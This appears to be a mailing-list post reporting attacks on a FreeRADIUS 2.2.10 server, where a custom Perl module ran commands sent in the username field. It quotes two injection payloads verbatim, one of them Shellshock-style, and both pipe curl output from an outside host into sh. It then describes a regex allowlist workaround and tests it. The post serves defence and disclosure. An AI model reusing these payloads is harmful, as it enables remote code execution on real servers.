Hi, We had upgraded our infrastructure to FreeRADIUS 2.2.10 due to us receiving a growing number of authentication requests, starting Fri Jun 29 00:48:59 (GMT), which result in FreeRADIUS downloading and executing code. Transmitting the following username results in a custom perl module executing the code: $(/usr/bin/curl v.kernelupgr.com/d/all|sh) We have observed another variant of this, which didn't appear to affect us: () { :;}; /usr/bin/curl v.kernelupgr.com/d/all|sh We've been able to work around the problem by placing the following code near the beginning of our Perl module: if ($RAD_REQUEST{'User-Name'} !~ /^[[:alnum:]._-]+$/) { return RLM_MODULE_NOTFOUND; }; Any suggestions regarding possibly cleaning other attributes which may result in code execution on the following line? &radiusd::radlog(1, "RAD_REQUEST: $_ = $RAD_REQUEST{$_}"); Testing: [davidh@zatjnb01-radius1 ~]# perl -le 'print "u-s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"' OK [davidh@zatjnb01-radius1 ~]# perl -le 'print "u\\s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"' BAD [davidh@zatjnb01-radius1 ~]# perl -le 'print "u s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"' BAD [davidh@zatjnb01-radius1 ~]# perl -le 'print "u\(s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"' BAD Regards David Herselman